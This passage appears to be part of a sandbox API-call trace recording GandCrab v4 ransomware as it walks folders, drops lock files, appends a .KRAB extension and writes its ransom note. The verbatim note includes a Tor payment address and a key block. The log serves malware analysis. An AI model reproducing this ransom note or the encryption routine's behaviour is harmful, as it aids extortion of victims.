DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.880] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.880] CloseHandle (hObject=0x43c) returned 1 [0099.881] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.881] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.881] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x4b)) [0099.881] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.882] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.882] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.882] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a08d2ca4dee3d.lock") returned 102 [0099.882] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0099.883] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.883] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.883] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\") returned 79 [0099.883] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*" [0099.883] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd920 [0099.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.883] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0099.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.884] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.884] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0099.884] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.884] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.884] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a08d2ca4dee3d.lock" [0099.884] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.884] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 107 [0099.886] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\d2ca4a08d2ca4dee3d.lock") returned 102 [0099.886] lstrlenW (lpString=".lock") returned 5 [0099.886] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.886] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.886] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.887] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.887] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0099.887] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.887] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.887] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\KRAB-DECRYPT.txt" [0099.887] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.887] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\KRAB-DECRYPT.txt.KRAB") returned 100 [0099.887] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\KRAB-DECRYPT.txt") returned 95 [0099.887] lstrlenW (lpString=".txt") returned 4 [0099.888] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.888] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.888] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.888] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\KRAB-DECRYPT.txt") returned 95 [0099.888] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\KRAB-DECRYPT.txt") returned 95 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.888] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.889] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.889] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.889] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.889] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0099.889] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0099.889] CloseHandle (hObject=0x43c) returned 1 [0099.889] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0099.889] FindClose (in: hFindFile=0xfbdb20 | out: hFindFile=0xfbdb20) returned 1 [0099.889] CloseHandle (hObject=0x778) returned 1 [0099.890] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0099.890] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.890] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.890] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\KRAB-DECRYPT.txt" [0099.890] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.890] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\KRAB-DECRYPT.txt.KRAB") returned 62 [0099.890] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\KRAB-DECRYPT.txt") returned 57 [0099.890] lstrlenW (lpString=".txt") returned 4 [0099.890] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.891] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.891] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.891] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\KRAB-DECRYPT.txt") returned 57 [0099.891] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\KRAB-DECRYPT.txt") returned 57 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.891] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.891] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.892] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0099.892] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0099.892] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0099.892] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows" [0099.892] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\" [0099.892] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.899] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.899] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0099.899] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0099.899] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0099.899] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="Windows Sidebar" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0099.899] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\" [0099.900] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.900] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.900] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.900] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.900] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.900] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.901] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.901] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\\\KRAB-DECRYPT.txt") returned 74 [0099.901] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0099.903] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.903] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.904] CloseHandle (hObject=0x778) returned 1 [0099.904] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.905] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.905] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x6b)) [0099.905] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.905] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.905] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.906] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a08d2ca4dee3d.lock") returned 80 [0099.906] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0100.019] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.019] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.019] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\") returned 57 [0100.019] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0100.019] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbdb20 [0100.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.019] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.019] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.020] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.020] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.020] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.020] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.020] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a08d2ca4dee3d.lock" [0100.020] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.020] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 85 [0100.020] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a08d2ca4dee3d.lock") returned 80 [0100.020] lstrlenW (lpString=".lock") returned 5 [0100.020] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.020] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.021] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.021] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.021] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.021] lstrcmpW (lpString1="Gadgets", lpString2=".") returned 1 [0100.021] lstrcmpW (lpString1="Gadgets", lpString2="..") returned 1 [0100.021] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="Gadgets" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0100.021] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 